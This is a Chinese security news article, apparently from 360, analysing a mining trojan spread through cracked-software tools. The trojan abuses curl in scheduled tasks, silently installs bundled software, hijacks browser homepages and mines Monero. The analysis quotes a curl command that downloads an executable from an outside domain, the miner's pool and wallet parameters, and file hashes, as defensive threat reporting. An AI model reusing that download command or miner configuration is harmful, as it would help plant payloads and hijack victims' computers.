首页 > 安全资讯 > 正文

开源工具遭利用,新型挖矿木马兼职“软件推销员”

近日,360安全中心监测到一类新型的挖矿木马在国内和国外都非常活跃,单日拦截量高达30万。此类挖矿木马利用了开源工具Curl.exe,或是wget.exe,带上参数(木马下载地址)使得恶意代码隐藏在系统计划任务中,因此很多杀毒软件都无法扫描出此类木马病毒。该木马病毒在感染用户计算机后,先是在用户电脑上静默安装至少七八个软件,其次还会篡改用户浏览器首页,这还没完,最后该木马会下载一个挖矿程序到用户电脑上,然后在后台偷偷执行挖矿。由于此类木马病毒利用了白文件,兼顾挖矿和静默安装软件,并且“作案手法”兜兜转转,因此,360安全中心的研究员把此类挖矿木马命名为CurlSoftwareBundlerMiner

经过研究员对此类病毒的解析发现,该木马病毒的来源主要是用户下载的各种软件破解器,外挂等工具在设备上运行所致。以下为研究员对此类挖矿木马做出的分析:

1.用户在运行带有木马恶意代码的程序后,该木马安装包开始解密并且执行木马关键代码,接着会下载并释放Curl白利用文件,创建计划任务。

(图:释放Curl白利用文件)

(图:创建计划任务)

2.创建的计划任务项目有两个,其中第一个为Curl,其对应的执行文件为curl_7_54.exe,该文件为开源工具Curl.exe 带参数-f -s -L http://atotum.ru/f.exe -o "%UserProfile%\AppData\Roaming\curl\curl.exe",此计划任务被触发后会下载一个木马到"%UserProfile%\AppData\Roaming\curl\curl.exe",而后会被Curls(第二个)计划任务触发并执行。如果说第一个计划任务是为攻击用户电脑做准备工作,那么第二个计划任务的主要功能就是实施一系列具体的攻击行为了。这些攻击行为主要包括下载挖矿木马、推广各种软件(静默安装)、和修改用户浏览器主页获利。

(图:两个计划任务项目)

3.木马开始释放第一个下载器,并且传入参数运行下载安装。

第一个下载器中的1.tmp.exe 带有正常的LLC Mail.Ru签名,是木马病毒可以下载na_runner.exe install 实施静默安装,添加启动项,修改浏览器主页。

(图:正常的LLC Mail.Ru签名)

(图:静默安装)

(图:篡改用户浏览器主页)

4.接下来木马会释放第二个下载器传入参数运行下载安装,与第一个相同的是8.temp.exe也携带了LLC Mail.Ru签名,不同的是,这次静默安装的是一个浏览器。

5.最后开始在用户电脑上下载安装挖矿木马,这个挖矿木马带有TOV "RED TABURET"正常的数字签名。该数字签名使得挖矿木马可以将自身拷贝到C:\WINDOWS\Microsoft\svchost.exe 后伪装成添加服务运行,而实则进行XMR挖矿。

-a cryptonight

-o stratum+tcp://mine.moneropool.com:3333

-u 4B9Darzi85pHxc53y1KZ6BHpFhdFSbTMYHMbK5BCByM36HsbsXqVzHYHwkybR1272oaZ4zPJ2EP79bw4dRUJR9pLSebAhDM -p x

(图:正常的数字签名)

(图:拷贝自身到C:\WINDOWS\Microsoft\svchost.exe

(图:伪装为服务)

(图:实施挖矿)

相关文件md5
f81069b5b3f7d8274e563a628929cde2
4dbc6848a826c4e98587d8fecf390a47
cf464d1f8ff321a74fddb4e00c20876a 
安全提醒
此次的新型木马由于非常活跃,单日拦截量高达30万,所以潜在的受害者也可能高于以往。一旦用户的电脑感染了此类“捆绑式攻击”的挖矿木马,会给用户使用电脑带来极大的不便和更多潜在威胁。360安全团队建议用户,一旦发现电脑卡慢,或是任何异常现象请及时使用安全软件扫描,保证安全软件处于开启状态。

安装了360安全卫士的用户请放心,即使在360安全卫士关闭状态下不慎中招,也可尽快开启进行查杀清除木马。360安全卫士已推出了挖矿木马防护功能,全面防御从各种渠道入侵的挖矿木马。用户开启了该功能后,360安全卫士将会实时拦截各类挖矿木马的攻击,为用户计算机安全保驾护航。
 

360安全卫士

热点排行